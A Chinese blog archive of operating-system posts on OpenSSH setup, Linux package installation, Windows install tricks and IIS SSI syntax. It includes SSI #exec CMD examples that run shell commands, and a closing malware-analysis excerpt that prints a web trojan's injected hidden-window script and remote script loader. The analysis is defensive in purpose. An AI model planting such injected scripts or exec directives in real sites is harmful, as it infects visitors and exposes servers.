一切福田,不離方寸,從心而覓,感無不通。

Category Archives: Operating System

Windows7安装OpenSSH

OpenSSH很老了,所以… 最开始只是因为openSSH启动不了,才用的MobaSSH,它配置简单兼容性好,缺点就是偷偷的建立了一个账户,让我感觉很不爽。所以决定把OpenSSH配置好。经过检查,发现OpenSSH安装的时候已经把环境变量添加好了,因此在命令行窗口是可以直接输入执行 ssh chmod等等命令的,但是当我输入ls的时候,提示缺少cygintl-2.dll,所以这个提醒了我更换检索词。最终解决这个问题。 下载地址: http://sourceforge.net/projects/sshwindows/files/OpenSSH for Windows – Release/3.8p1-1 20040709 Build/setupssh381-20040709.zip/download 1. 默认安装 2. 补上cygintl-2.dll和cygwin1.dll 下载:http://samanthahalfon.net/resources/cygwin_includes.zip 将它们复制到c:\Program Files (x86)\OpenSSH\bin目录下,如果提示覆盖,则覆盖之,不然进行下面操作,会提示 不能启动opensshd服务 OpenSSH Error 1067:The process terminated unexpectedly 系统出错,进程意外终止 3. 开始安装 cd "c:\Program Files (x86)\OpenSSH\bin" mkgroup -l >> ..\etc\group 生成一个group mkpasswd -l [-u <username>] >> ..\etc\passwd 比如: mkpasswd -l -u mxio >> ..\etc\passwd 这样就生成用户名mxio的passwd文件, 它调用的是系统用户名和密码 cd ..\..\etc 给权限..\bin\chown mxio * ..\bin\chmod 600 * 4. 启动opensshd服务 不出问题会提示启动成功 net start opensshd 5. 测试连接 ssh mxio@localhost

龙生   19 Nov 2012
View Details

Linux下的软件安装方法-rpm与*.tar.gz

 From:     http://blog.chinaunix.net/u/26011/showart_258096.html系统安装好后,最重要的是软件的安装了,Linux中的软件安装不像在Windows里面那样只要点下一步下一步就可以了。不过还是有规律可找,不会超过这些。 目前流行的软件包有两种比较常见的形式,一种是RPM包的形式,另一种是压缩成*.tar.gz的形式. A、安装简便的RPM包RPM是Redhat Package Manager的缩写,它只能使用在安装了RPM软件的系统中。语法:#rpm [options] filename.rpmoptions(注意大小写):-i :安装软件-e :卸载软件-q :查看软件安装信息和状态-U:升级现有软件-v:显示附加信息-h :安装时以#号显示安装进度,每#为2% 注意:如果要安装Filename.rpm软件只要用 rpm –ivh filename.rpm,软件安装在什么,是怎么安装的都不需要用户操心,不过安装不成功往往是权限和依赖关系,一定要注意当有多个软件包时有一定的顺序,如果没有安装上看错误提示。(在图形化界面RPM包也是相当容易安装跟在Windows中差不多)查询RPM包有时我们要装一个包了,要看这个包有什么用或要用某个软件不知道自己以前装过没有,就可以用查询命令来查看。 1)软件包信息的查询语法:# rpm {-q | --query} [ select-options ] [ query-options ]-q –query : 必要的参数,表示执行查询操作Select-options用来指定本次查询对象,选项:-a :查询所有安装的软件包-f<file> :查询<file>属于哪个软件包--whatrequires<X> :查询所有需要<X>功能的软件包-p<file> :查询未安装的软件包信息Query-options用来指定本次查询所要获得的信息:<null> :为空时显示包的全部标识-i :显示软件包的概要信息-l :显示软件包中的文件列表--provides :显示软件包提供的功能--requires[-R] :显示软件包所需要的功能-c :显示配置文件列表例:安装soft.rpm包,并查询软件信息# rpm –ivh soft.rpm查询soft.rpm软件包的安装文件列表# rpm –ql soft.rpm 2) 查询已经安装好的软件包:# rpm –qa | grep soft.rpm查询是否安装了soft.rpm包# rpm –ql soft.rpm查询soft.rpm安装的位置 # rpm –qi soft.rpm 查询软件信息 B、安装需要编译的.tar.gz包由于RPM包使用的局限性,目前更多的软件使用的是源代码形式的.tar.gz包。这种软件的安装通常要经过解压缩、软件配置、软件编译及安装的过程。1、软件安装的第一步通常是解压,下面介绍几种压缩软件的解压与压缩命令: 注意:在解压和压缩之前一定要确定当前用户对文件是有执行权的。 用命令ll来查看,如果没有用chmod来更改,如果对一个文件夹,文件夹中有多个文件要加-R参数,即#chmod –R 755 /tmp/soft(例) 1)解压后缀为.tar的文件# tar xvf soft.tar 2)解压后缀为.tar.gz的文件 # gunzip soft.tar.gz # tar xvf soft.tar(注意:有两步先用guzip解开.gz再用tar解开.tar)# tar xvfz soft.tar.gz(用tar解压注意不同后缀的参数 )用另外一个命令来解压# gunzip –c soft.tar.gz | tar xvf – 3)压缩文件为.tar.gz的后缀 # tar cvf soft.tar /tmp/soft# gzip –q soft.tar /tmp/soft# tar cvfz soft.tar.gz /tmp/soft用另外一个命令来压缩# tar cvf – /tmp/soft | gzip –qc > soft.tar.gz 参数说明(参数小写):-x :释放文件内容-v :显示流程信息-z :解压ZIP压缩包-c :建立一个新压缩文件-f :定义压缩中的文字 4)解压后缀为tar.z的文件# tar xvfz soft.tar.z或# uncompress soft.tar.z( 一样有两步 )再# tar xvf soft.tar5)解压后缀为.tgz文件# gunzip soft.tgz 6) 压缩和解压后缀为.bz2的文件# bzip2 /etc/httpd.conf(将文件httpd.conf压缩为httpd.conf.bz2)# bunzip2 /etc/httpd.conf.bz2 (将文件httpd.conf.bz2还原为httpd.conf) 2、一般来说,在解压缩生成的目录中都会有名为Readme、 Rnstall或Readme.install之类的文件。这些文件通常会对软件的功能、特性、版权许可、安装以及相关知识加以介绍,并且会提到关于安装的方法和步骤。说明文档常用的短语:1.Overview for the impatient(概括说明配置的全过程) $./configure--prefix=PREFIX $make $make install $PREFIX/bin/apachectl start 2.Requirements(需要的条件) 3.Configuring the source tree(配置的参数说明) 4.Building the package(编译软件的方法) 5.Installing the package(安装软件的方法) 6.Testing the package(软件测试)一般来说,与安装软件有直接关系的文件只有两个:configure 、Makefile。 理解并能熟练使用这些说明文件后,就可以利用一些规律来安装大多数的软件。对于那些没有说明文件的软件(当然这种情况比较少见),这些规律通常也是适用的。一般来说,与安装软件有直接关系的文件只有两个:configure 、Makefile。 其中,configure文件具有可执行的属性,是用来配置软件的,它的参数比较多,用法也比较灵活。当然,不同的软件参数也不相同,这时候就需要借助它的help参数,运行下面的命令就会让你感到豁然开朗: #〉 ./configure -help Usage: configure [options] Options: [defaults in brackets after descriptions] General options: --quiet, --silent do not print messages --verbose,-v print even more messages --sha [=DIR] switch to a shadow tree (under DIR) for building Stand-alone options: --help,-h print this message --show-layout print installation path layout (check and debug) Installation layout options: --with-layout=[F:]ID use installation path layout ID (from file F) --target=TARGET install name-associated files using basename TARGET …… 接下来,就可以运行“./configure [options]”来配置该软件。注意,命令行中的“./”非常重要,它告诉系统要运行的命令就在当前目录下(否则系统就会到$path变量指定的路径下去执行命令)。执行命令后可以生成Makefile文件或者修改已有的文件配置。 Makefile文件通常是用来编译和安装软件的。运行make命令时系统会自动根据Makefile文件中的设置对软件进行编译和安装。make命令有时还可以带一些参数,如:all、build、 config、install等。具体要带哪个参数可以参看Makefile文件。在Linux中绝大部分文件是文本文件,Makefile就是一个 shell程序(Linux中shell程序与DOS中的批处理文件有很多相似之处,当然功能要强得多),很容易读懂,尤其是编译时可带的参数都会明确写出,例如: ##======================== ## Targets ##======================== # default target all: build ##———————— ## Build Target ##———————— # build the package build: …… # the non-verbose variant for package maintainers build-quiet: @$(MAKE) -f $(TOP)/$(MKF) $(MFLAGS) $(MFWD) QUIET=1 build # build the additional support stuff build-support: …… ##———————— ## Installation Targets ## ———————-- # the install target for installing the complete Apache # package. This is implemented by running subtargets for the # separate parts of the installation process. install: …… # the non-verbose variant for package maintainers install-quiet: @$(MAKE) -f $(TOP)/$(MKF) $(MFLAGS) $(MFWD) QUIET=1 install # create the installation tree install-mktree: …… 上面这段代码是apache_1.3.6的Makefile文件的一部分,从这段程序可以看出all参数表示完全编译(缺省参数)。此外,编译时还可以带 build、build-quiet、build-surpport等参数;安装时可以带install、install-quiet、install- surpport等参数。它们的功能分别在“#”表示的注释中进行了说明。需要额外说明的是,有些软件(例如Linux的内核升级程序)不用 configure命令来配置软件,而是用make config来完成这项工作,所以,具体使用哪种方法要具体问题具体分析。 C、其它的安装方法,利用脚本的安装(详细)。 例:安装Webmin-1.250.tar.gz先挂载:# mount /dev/cdrom /mnt/cdrom 进入挂载点:# cd /mnt/cdrom 拷贝Webmin-1.250.tar.gz到/tmp下或者你想解压的目录 再进入/tmp: # cd /tmp 改变文件的权限: # chmod 755 webmin-1.250.tar.gz(因为一般挂载过来的文件都是只有只读的权限) 解压:# tar xvfz webmin-1.250.tar.gz 进入解压后的文件夹:# cd webmin-1.250 现在可以用ls查看一下文件,现在如果自己没有资料介绍,第一次安装一般都是查看说明文档如:README、Rnstall或Readme.install之类的文件。 现在找到README文档,(进行简单的中文说明##后的为说明) […]

龙生   17 Nov 2012
View Details

CentOS 6.2 安装OpenSSH Server

安装好了CentOS 6.2,我想让它作为一个服务器,可以让我的Windows 7电脑远程登录。   安装OpenSSH Server 首先,我们搜索一下CentOS的软件库里面有没有已经定义好的SSH服务器包:

  OpenSSH是Secure Shell的一个开源实现。从上面的搜索结果可以看到,CentOS的软件库里面已经有了OpenSSH的服务器包(openssh-server)和客户端包(openssh-clients),用yum install可以直接安装。

  OpenSSH Server安装完成后在/etc/init.d目录下应该会增加一个名为sshd的服务。可以参考《CentOS设置服务开机自动启动》的方式配置sshd服务开机自动启动。

  手动启动sshd服务,方便后面客户端的连接:

  用密码方式登录远程服务器 WIndows 7里面的SSH客户端软件我用的是XShell。打开XShell,新建连接,选择Password验证方式,输入用户名和密码,这样就可以连接到服务器了。   登录成功后的画面:   用RSA密钥登录远程服务器 OpenSSH允许使用RSA的方式登录服务器。RSA加密方式会有两个文件:一个是公钥文件,放在服务器$HOME/.ssh/authorized_keys文件里面;另外一个是私钥文件,放在客户端电脑上。   产生RSA密钥对,可以在服务器产生,也可以在客户端产生:

执行完毕后,会在$HOME/.ssh目录下多出来两个文件:id_rsa.pub(公钥文件)和id_rsa(私钥文件)。   将公钥文件追加到$HOME/.ssh/authorized_keys文件后面:

  将私钥文件下载到客户端电脑(可以使用SFTP方式,例如XFtp,WinSCP等很多软件),然后新建XShell连接,选择Public Key验证方式:   配置完毕,现在我们可以不用输入密码也能够连接到服务器了。   OpenSSH相关目录和文件 所有配置信息保存的目录:/etc/ssh sshd服务配置文件:/etc/ssh/sshd_config   OpenSSH相关链接 《用OpenSSH构建SSH服务器》:安装O盆SSH服务器。 《用SSH客户端软件登录到服务器》:如何用PUTTY+RSA登陆远程服务器。 《CentOS Wiki – 保卫 OpenSSH》:OpenSSH的安全设置。 《Top 20 OpenSSH Server Best Security Practices》:20个需要遵守的SSH安全建议。   转自:http://www.cnblogs.com/eastson/archive/2012/06/29/2570163.html

龙生   17 Nov 2012
View Details

MIME TYPE 大全

Mime-Typ Dateiendung(en) Bedeutung application/acad *.dwg AutoCAD-Dateien (nach NCSA) application/applefile   AppleFile-Dateien application/astound *.asd *.asn Astound-Dateien application/dsptype *.tsp TSP-Dateien application/dxf *.dxf AutoCAD-Dateien (nach CERN) application/futuresplash *.spl Flash Futuresplash-Dateien application/gzip *.gz GNU Zip-Dateien application/listenup *.ptlk Listenup-Dateien application/mac-binhex40 *.hqx Macintosh Bin&auml;r-Dateien application/mbedlet *.mbd Mbedlet-Dateien application/mif *.mif FrameMaker Interchange Format Dateien application/msexcel *.xls *.xla Microsoft Excel Dateien application/mshelp *.hlp *.chm Microsoft Windows Hilfe Dateien application/mspowerpoint *.ppt *.ppz *.pps *.pot Microsoft Powerpoint Dateien application/msword *.doc *.dot Microsoft Word Dateien application/octet-stream *.bin *.exe *.com *.dll *.class Ausführbare Dateien application/oda *.oda Oda-Dateien application/pdf *.pdf Adobe […]

龙生   08 Oct 2012
View Details

不用windows安装盘安装64位win7或windows server 2008的方法(32位winpe下安装64位的办法)

 首先备windows server 2008  r2镜像一个,PE程序(我用的是win2003 的pe光盘版,大家可以用U盘版的),32位bootsect.exe文件 1、解压windows到文件夹中(暂定windows文件夹吧),随便解压到除C盘外的盘符中 2、用winpe启动计算机,格式化C盘(因为我要把系统装在C盘里)。    3、将安装文件夹根目录的boot文件夹和bootmgr文件复制到C盘,在c盘中新建文件夹sources,将安装文件夹中sources文件夹中的boot.wim复制到新建的文件夹中,替换bootsect.exe(我用的是win7 32位 里的)文件(在boot文件夹中)   4、运行cmd 执行C:\boot\bootsect.exe /nt60 c: 5、再用刚才解压的64位的bootsect.exe覆盖掉32位的。     6、重新启动(硬盘启动)。 7、这时候你可以看到win7的启动界面和安装界面了,选择修复,选第一项,下一步,选择命令行。   8、输入c:回车del bootmgrdel bootdel sources(这些以后格式化也可)9、用命令行的方式进入解压的windows文件夹下的sources文件夹,输入setup.exe,OK到此为止现在windows就开始安装了。   转自:http://www.cnblogs.com/wenwuxianren/archive/2011/03/19/1988809.html

龙生   01 Sep 2012
View Details

IIS5服务器端包含的指令语法和参数值

服务器端包含的指令和使用程序本节介绍IIS 5.0服务器端包含的指令的语法和参数值。还介绍IISRESTART实用程序的语法和使用,该实用程序可用来从远程计算机、命令行和SSI指令的内部管理Web服务器。 1. SSI指令、属性和标记指令 说明#include 将指定的文件内容插入到被发送到客户机的响应流中,并替换该指令。例如:<!-- #include file=”userfilbits.inc”à#config 指定用于日期、时间和文件尺寸的格式,以及返回客户机的通用SSI错误消息的文本格式。例如:<!—#config ERRMSG=”SSI Processing Error”à<!—#config TIMEFMT=”%A, %B, %d, %Y, %H:%M:%S ”à<!—#config SIZEFMT=”BYTES”à参见下文中关于用于该指令的属性和标记的列表#echo 将HTTP环境变量插入到发送给客户机的相应流中,并替换该指令。例如:<!--#echo VAR-“SERVER_NAME”à参见下文中关于用于该指令的属性和标记的列表#exec 在服务器上执行一个程序或shell命令。例如:<!--#execCGI=”/scripts/myapp.exe?value1=this&value2=that”à<!--#exec CMD=”cmd.exe /c iisrestart /stop”à<!--#exec CMD=”cmd.exe /c net start cisvc”à参加下文中关于该指令的属性和标记列表。必须添加以下条目到Windows Registry中才可以使用CMD属性:HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/W3SVC/Parameters/SSIEnableCmdDirective将该值设置为1并重新启动WWW服务,CMD属性才被允许用于#exec指令。将其设置为0则禁止它并防止未验证的使用,否则将会破坏服务器的安装。#flastmod 将指定文件的最新更改的日期和时间插入到要发送客户机的响应流中。例如:<!--#flastmod file=”default.asp”à参见下文中关于该指令的属性和标记的列表。#fsize 将指定文件的尺寸插入到要发送给客户机的响应流中。例如:<!--#fsize file=”default.asp”à参见下文中关于该指令的属性和标记的列表。2. #exec指令的命令类型属性属性 说明CGI 在Web服务器上下文中执行指定的应用(即通过ISAPI对请求和响应的访问),并将任何查询串的值传递到应用中。该应用与Web服务器运行在不同的内存中CMD 启动指定的操作系统命令的解释程序的一个实例,并执行该指令的命令3. #cinlcude、#flastmod和#fsiaze的路径类型属性属性 说明FILE 该属性的值是绝对和相对路径加上文件名,就像在DOS命令提示中所使用的,如“/files/web/myfile.txt”VIRTUAL 该属性值是绝对路径和相对路径加上文件名,与当前的Web站点的根文件夹相关。如“/file/web/myfile.txt”4. #config指令的SIZEFMT标记标记 说明BYTES 文件大小将以字节返回ABBEV 文件大小将以计算并以最近的千字节(KB)数返回5. #config指令的TIMEFMT标记标记 说明%a 一周的日子按”Mon”、”Tue”等表示%A 一周的日子按”Monday”、”Tuesday”等表示%b 月份名按”Jan”、”Feb”等表示%B 月份名按”January”、”February”等表示%c 与服务器的地区相对应的当前的日期和时间格式(如11/06/99 12:51:32)%d 一月的日子按数表示(01到31)%H 用24小时格式表示当前时间(00到23)%I 用12小时格式表示当前时间(01到12)%j 按数字(001到366)表示一年的日子%m 月份按数字表示(01到12)%M 当前分钟按数字表示(00到59)%p 按服务器地区表示相应的“上午”或“下午”文字如(AM或PM)%S 当前的秒按数字表示(00到59)%U 一年的每周按数字表示(00到51),并且每周的第一天为Sunday%w 一周每天按数字表示(0到6),并且每周的第一天为Sunday%W 一年的没有数字表示(00到51),并且每周的第一天为Monday%x 当前的日期格式对应于服务器地区表示的(如11/06/99)%X 当前时间格式相应与服务器地区表示的(12:51:32)%y 没有世纪表示的年数(如01)%Y 有世纪表示的年数(如2001)%z,%Z 服务器时间带的名字或缩写(如果知道的话)%% 百分号字符6. #echo指令的VAR标记标记 说明AUTH_TYPE 客户机用来验证网页是否拒绝匿名访问的验证类 型,如“Basic”或“NTLM”(即,询问/响应)AYTH_PASSWORD 由用户向服务器提供的口令,如果该页拒绝匿名访问并且客户机使用Basic方法验证的话AUTH_USER 由用户向服务器提供的用户名,如果在NTLM和Basic(或其他)方法下该页拒绝匿名访问的话CONTENT_LENGTH 在请求体中发送的字节数,即,作为POST向服务器发送的字节数CONTENT_TYPE 作为POST在请求体中发送的数据MIME类型DOCUMENT_NAME 由客户机请求的文档的全实际路径和文件名DOCUMENT_URT 由客户机请求的文档的全虚拟路径和文件名DATE_GMT 服务器操作系统中的日期和时间设置,不带任何Greenwich Mean Time的调节DATE_LOCAL Greenwich Mean […]

龙生   09 Aug 2012
View Details

SSI语法

Basic SSI directives Syntax

Today’s date

Modification date of the file

Including the results of a CGI program

You can use "#exec cgi=" directive, but it can be disabled using the IncludesNOEXEC Option. Including a standard footer

Executing commands

This feature is dangerous. You can allow SSI, but not the exec feature, with the IncludesNOEXEC argument to the Options directive. Setting variables

Conditional expressions

 

龙生   09 Aug 2012
View Details

Red5不能启动,删除这两个文件却可以,不理解

Red5不能启动,删除这两个文件却可以,不理解: com.springsource.slf4j.juli-1.6.1.jarcom.springsource.slf4j.log4j-1.6.1.jar

龙生   28 May 2012
View Details

以毒攻毒,直捣“毒窟”

一,、陷入毒窝 我们在Google中搜索资料的时候,经常会看到这样的搜索结果“该网站可能含有恶意软件,有可能会危害您的电脑。”或者“继续访问 http://www.*.com,但风险自担。”这是Google以自己的方式对网页安全性分析的结果。我们没有理由怀疑Google的技术,这是它在以自己的方式告诉我们“这是个毒窝”。以“不入虎穴,焉得虎子”的英勇,我们就去探探虎穴。 测试环境说明:一安装有Windows XP的虚拟机,没有打补丁包,没有安装杀毒软件和防火墙。 1.探毒 第一步:下载网页(为了不至于“出师未捷,而光荣牺牲。”我先把挂马的网页下载下来。看看到底用了什么网马,怎么挂的?)用迅雷很快地把挂了马的网页下载下来。 第二步:分析网页代码 用记事本打开网页查看源代码,通过分析,发现挂马者在该网站的首页的开头和尾部都加入了如下的代码: <SCRIPT language=javascript> window.open ("http://www.*.com/1.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); </script> 这是一个用javascript脚本木马的代码,其中的http://www.*.com/1.htm应该是网页木马的地址。 第三步:继续用迅雷下载http://www.*.com/1.htm,用记事本打开,代码如下: <script language=javascript src="http://my.*.com/admin.js>"; </script> 这是一个木马脚本,通过脚本调用了一个js文件。第四步:用迅雷下载admin.js文件,用记事本打开,部分代码如下: eval(function(p,a,c,k,e,d){e=function(c){return(c http://net.zdnet.com.cn/network_security_zone/2007/1225/690486.shtml

龙生   14 May 2012
View Details